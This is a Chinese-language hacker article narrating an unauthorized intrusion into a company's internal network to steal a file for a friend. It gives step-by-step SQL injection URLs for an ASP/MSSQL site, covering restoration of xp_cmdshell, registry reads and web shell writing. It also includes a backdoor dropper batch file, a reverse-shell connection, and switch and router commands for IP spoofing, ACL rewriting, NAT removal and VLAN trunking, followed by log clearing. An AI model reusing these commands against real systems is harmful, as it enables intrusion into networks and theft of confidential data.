滲透某知名公司內部網絡
文章作者:EvilAngel(evilangel@china.com.cn)
信息來源:邪惡八進制信息安全團隊(www.)
此文以發(fā)表在非安全雜志 后由原創(chuàng)作者友情提交到邪惡八進制信息安全團隊 轉載請注明出處及原作者
本文的目標是一國內知名公司的網絡,本文圖片���、文字都經過處理�,均為偽造��,如有雷同����,純屬巧合�。
最近一個網友要我?guī)退盟麄児緝染W一項重要的文件,公司網絡信息朋友都mail給我了�,這些信息主要是幾張網絡拓撲圖以及在內網嗅探到的信息(包括朋友所在的子網的設備用戶名及密碼等信息……)�。參照以上信息總體整理了一下入侵的思路��,如果在朋友機器安裝木馬�����,從內部連接我得到一個CMD Shell���,須要精心偽裝一些信息還有可能給朋友帶來麻煩��,所以選擇在該網絡的網站為突破口�,而且管理員不會認為有“內鬼”的存在�����。
用代理上肉雞����,整體掃描了一下他的網站,只開了80端口����,沒掃描出來什么有用的信息,就算有也被外層設備把信息過濾掉了,網站很大整體是靜態(tài)的網頁�,搜索一下,查看源文件->查找->.asp���。很快找到一個類似http://www.*****.com/news/show1.asp?NewsId=125272頁面,在后面加上and 1=1 �、and 1=2前者正常,后者反回如下錯誤��。
Microsoft OLE DB Provider for ODBC Driver error ‘80040e14‘
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”.
/news/show/show1.asp���,行59
是IIS+MSSQL+ASP的站����,在來提交:
http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select is_srvrolemember(‘sysadmin‘))
http://www.*****.com/news/show1.asp?NewsId=125272 and ‘sa‘=(select system_user)
結果全部正常�,正常是說明是當前連接的賬號是以最高權限的SA運行的,看一下經典的“sp_cmdshell”擴展存儲是否存在���,如果存在那就是初戰(zhàn)告捷�。
http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell‘)
失敗��,看看是否可以利用xplog70.dll恢復����,在提交:
http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc ‘xp_cmdshell‘,’xplog70.dll’
在試一下xp_cmdshell是否恢復了,又失敗了�,看樣管理是把xp_cmdshell和xplog70.dll刪除了,想利用xp_cmdshell“下載”我們的木馬現在是不可能的�����。首先我們先要得到一個WEB Shell��,上傳xplog70.dll��,恢復xp_cmdshell在利用xp_cmdshell運行我們上傳的木馬����,這都是大眾入侵思路了,前輩們以經無數人用這個方法入侵成功��。拿出NBSI掃一下����,一會后臺用戶名和密碼是出來了,可是后臺登錄地址掃不出來�����,測試了N個工具、手工測試也沒結果�����,有可能管理員把后臺刪除了�����。我們想辦法得到網站的目錄�����,這時就須要用到xp_regread��、sp_makewebtask兩個擴展存儲����,試一下是否存在:
http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where name = ‘xp_regread‘)
http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where xtype=‘X‘ and name = ‘sp_makewebtask‘)
全部返回正常說明存在(一般的網管不太了解他們,存在也很正常)�,首先簡單介紹一下xp_regread擴展存儲過程及sp_makewebtask Web助手存儲過程,xp_regread是用來讀取注冊表信息的�,我們可以通過這個來得到保存在注冊表中的Web絕對路徑。sp_makewebtask這個就是我們用來得到WEB Shell的�����,主要功能就是導出數據庫中表的記錄為文件。這個方法網上很早就出現了�,我們網站的目錄在注冊表里是在HKEY_LOCAL_MACHINE‘,‘SYSTEM\ControlSet001\Services\W3SVC\Parameters\,我們在數據庫里建一個表����,將他存儲在表里����,在使數據庫錯誤回顯在IE里。
http://www.*****.com/news/show1.asp?NewsId=125272;create table [dbo].[biao]([zhi][char](255));
這時候我們就建了一個名為biao的表����,并添加了一個類型為char長度是255的字段,名為zhi�,然后添加數據:
http://www.*****.com/news/show1.asp?NewsId=125272;declare @result varchar(255) exec master.dbo.xpregread‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots‘,‘/‘, @result output insert into biao (zhi) values(@result);--
然后暴出WEB絕對路徑:http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from biao where zhi>1)
IE返回錯誤,得到網站的物理路徑e:\inetput\web\�,向網站目標寫個小網頁木馬,一個朋友以前寫過一個程序��,由于只是內部用的�,我就不抓圖了,網上早就有發(fā)布過這種工具�����,有興趣下載自己看看吧!原理都是一樣的���,如果想手工輸入就是麻煩了點�,但可以向網站腳本文件寫入“一句話木馬”在遠程提交�,以得到一個大馬的目的。登錄木馬后把自己機器的xplog70.dll上傳到網站目錄在傳一個hacker‘s door�,黑客之門只有一個dll,我們要建一個批處理��,名子為run.bat:
@echo off
@rundll32 kernel,DllRegisterServer svchost.exe
@del run.bat
在拿一下文件合并器�,將我們建的批處理和dll文件合并成一個exe文件,黑客之門的使用方法我就不多說了����,他有詳細的使用手冊,建議在處理一下�����,以免傳到服務器上被查殺��。黑客之門主要用處是可以利用服務器上所開的任何端口和我通信�����,現在恢復他的xp_cmdshell擴展存儲:
http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc ‘xp_cmdshell‘,’e:\inetput\web\xplog70.dll’;--
在IE里提交:exec master.dbo.xp_cmdshell’ e:\inetput\web\rootkit.exe’ rootkit.exe是黑客之門改的名子,注意這個程序要解綁到系統目錄如圖1�����。
木馬運行后�����,Nc –vv ip 80 輸入密碼就得到一個CMD Shell�,在放一個隱藏的asp木馬����,簡單的把入侵的痕跡清理一下。以上的方法很早就有了�����,由于網上資料也很多�、本文主要說滲透內網,篇幅有限我就不過多解釋了�。
滲透內網
這個網絡很大共有七個網管,現在當前位置是F網�����、朋友在B網、目標在A網����。朋友給的資料,目前接入internet的兩臺設備未知(假設未知的設備都是路由器)����,圖2是該公司大體的網絡拓撲圖。掌握B網所有設備用戶名密碼(朋友之前嗅探到的)��。除A網其它網絡可以自由通信�, A網內有公司重要信息所以不像其它網,它是不允許任何人訪問的����,路由不給予轉發(fā)數據,也就是只進不出的網絡���,雖然現在的網絡是外緊內松���,但是想進入目標主機還是有些難度。怎么跨過設備的限制到達目標呢��!您還要向下看?�,F在首要的目的就是讓router3給我們轉發(fā)數據包����。
首先嘗試telnet登錄路由��,拒絕訪問不能登錄�,我想也不能登錄,應該是訪問控制列表限制了�����。
現在我們首要目標拿下router3的控制權�����,為什么目標定位在router3呢���!
我們現在知道他的登錄密碼;
我當前位置可以和B網直接通信�;
Router3是A、B網絡公用的�����,應該兩個網管都有權限登錄���;
這一點也是最重要的��,只有router3給予數據轉發(fā)才可以和目標主機通信��;
個人認為router3是最佳路線�,現在假設一下,如果B網管理員所管理的設備只有他本身所用的IP或TFTP Server(兼DHCP Server)才可以登錄設置����,那么有如下思路可以完成入侵。一般來說管理員主機一定可以登錄這臺路由器的���,網管主機都不可以登錄設備那么誰為維護網絡呢����!
1�、直接得到B網管理員主機的一個CMD Shell來登錄設備。
2�、得到管理員同網段一臺主機的CMD Shell,從而利用ARP欺騙來telnet目標路由����。
3、得到B網其它網段中可訪問外部網絡一臺主機的CDM Shell,偽裝CDM Shell主機IP地址�,必要情況偽裝IP+MAC地址來欺騙路由器,(機會高達到50%)���。
經過分析拿B網的DHCP服務器(172.16.101.25)開始�,選擇突破點也是很重要的����,DHCP服務器為了提供這個網段的服務他是暴露在相對外部的,而且不在VLAN的管轄中����,還和網管在同一交換機下,而且聽朋友說他們公司PC幾乎不打補丁�,還有很多員工不知補丁為何物,這也給入侵帶來及大的方便��。利用服務器的WEB木馬上傳一些流行的溢出程序��,直接拿個溢出程序溢出他的DHCP服務器����,(最后才知道2003年的溢出程序對這個主機都有用)成功得到一個System權限的CMD Shell�����。
革命尚未成功,同志們還須努力?�?!“下載”我們肉雞一個反彈的木馬,我們的肉雞是不能主動連接DHCP服務的�,好像有點費話。現在這個主機就是我們在內網的一個接入點��,放棄我們剛才控制的那個WEB主機���,利用反彈木馬開的個CMD���。telnet一下路由,%connection closed by remote host!還是連接失敗��,不能登錄路由器�����,看樣只有172.16.101.15這臺主機(管理員IP)可以登錄了��,我們看一下登錄他的交換機OK不(一般工作組交換機權限設置不會那么BT)����。
telnet 172.16.101.253 //交換機管理地址
Password:
center>enable
Password:
成功登錄�����,show mac-access���、show cdp neighbors、show arp一些命令判斷管理員對應的結口����,管理員的IP對應的是FastEthernet 7/1,這個時候要用到IP地址的欺騙��,在此感謝EST長的最難看的哥哥��。
#interface FastEthernet 7/1
#shutdown
當然�����,這要等網管離開的時候才可以�,這就要內外結合了。這個時候172.16.101.15這臺主機在網絡上以消失了����,我們試一下路由是否允許網管的主機登錄,把自己的IP改成172.16.101.15,輸入:
netsh >interface ip
netsh interface ip >dump看一下接口配置信息
netsh interface ip >set address name = ″本地連接″ source = static addr = 172.16.101.15 mask = 255.255.255.0
這時候當前主機地址改為172.16.101.15��,現在這個主機會和我斷掉���,但只是一小會�,我們的反彈木馬一會就能上線����。一般重新變改IP地址要發(fā)個ARP包告訴網絡其它主機,大概意思是我的IP是172.16.101.15��,MAC地址是00-00-00-00-12-34����,以后有發(fā)往172.16.101.15地址的數據包都有我來響應。交換機刷新地址表后這臺主機偽裝成功���。在telnet登錄路由器��,如圖2
show running-config看一下配置信息�����,把路由配置信息COPY到記事本在分析���,找到如下配置信息��。
access-list 99 172.16.8.88 0.0.0.0 //A網管理員地址
access-list 99 172.16.101.15 0.0.0.0
訪問列表99限制只有以上兩個IP可以登錄路由��,看來是這個家伙在作怪�����。刪除99訪問列表���,在添加99訪問列表:
#access-list 99 172.16.68.88 0.0.0.0
#access-list 99 172.16.101.15 0.0.0.255 //改成172.16.101.0/24網段都可以登錄
#line vty 0 4
#access-class 99 in
退出路由系統,把自己IP改回來����,把交換機設置也改回來以免網管回來被發(fā)現。
center(config)#interface FastEthernet 7/1
center(config-if)#no shutdown
簡單的清理一下留下的痕跡��,退出他們的網絡來分析一下網管是怎么配置的路由���,在路由配置信息中有幾條重要信息�。
ip nat pool NO.1027 10.255.200.1 10.255.200.105 netmask 255.255.255.0
ip nat inside source list 10 pool NO.1027 overload
access-list 10 permit 172.16.7.0 0.0.0.255
access-list 10 permit 172.16.8.0 0.0.0.255
……
router eigrp 10
真是不敢恭維網管的技術��,一條訪問列表可以搞定的事�����,非要分成N個訪問列表來描述�����。到這時才明白為什么朋友不能訪問目標主機�����,因為A網邊界路由器為其作NAT的地址轉換���,將B類地址轉換成A類地址,并且有訪問列表限制?,F在要使當前主機和目標主機在“堡壘”中建立一條專用的“線路”�����。我這對路由的配置不是很熟悉,也不敢太多的嘗試�����,以免被網管發(fā)現���,但是我們可以“重新”配置一下他的eigrp協議,使內部的地址完全暴露在外邊�����,但此辦法太容易讓網管發(fā)現���,但是當時沒想出別的辦法來����。
#clear ip nat translation *
#no ip nat inside source list 10 pool NO.1027 overload
#no …… //去掉他的訪問列表及NAT配置信息
#router eigrp 10
(config-router)#network 172.16.2.0 0.0.0.255
(config-router)#network 172.16.3.0 0.0.0.255
(config-router)#network …… //把所有的網段加進去
#reload 10 //10分鐘后設備自動重啟
現在路由器就可以為我們轉發(fā)數據包了���,并且在10分鐘自動重啟使更改的的配置失效,我們現在只差一步就大功告成了���,現在須要在我控制的那臺主機到目標主機創(chuàng)建一條干線使我們的數據包可以直接到達目標主機��。
show cdp neighbors得到如下信息:
Device ID Local Intrfce Holdtme Capability Platform Port ID
Router3 Fas0/12 176 R 2621 4
在交換機中添加VLAN 13,(目標主機的VLAN號)����,進入Fas0/12端口�, “switchport trunk all vlan add 13 ”�,在trunk中添加VLAN13���,使這條線路可以通過VLAN13的數據�����,沒有必要改變自己的VLAN號,路由器現在沒有訪問列表來控制我們的數據流�����。這個時候我們ping 172.16.8.120目標主機物理IP地址數據包可以到達了����。
這次入侵也接近尾聲了�,和以前一樣還是溢出后安裝一個反彈木馬,使他可以主動連接我的肉雞���,當然這要在10分鐘內搞定,否則要重新進路由改變他重啟的時間����,備份他硬盤上的數據,備份肉雞上的數據�,最后就是清理一下入侵的痕跡���。這次入侵大約10天才完成���,因為要等到特定的時間才可以改變他的網絡設備配置���,比如改變路由器的訪問列表進一定要等到下班時間����,大多用戶不使用網絡時�、而目標主機還在使用網絡時���、網管還沒有關閉設備時�����,也就是要和網管打個時間差�。
本文經過N次的篩選終于從萬字的文章精減出此文,可讀性��、實用性一定會有不同程度上的衰減���,本次入侵沒有什么新的技術�����,主要說怎樣繞過內部網絡設備的限制�,只不過是一些經驗的疊加,針對網絡設備入侵這也算很初級的��。
當時投稿的時候少寫了個步驟,少了是不會成功的�,仔細看的朋友一定能看出來
|
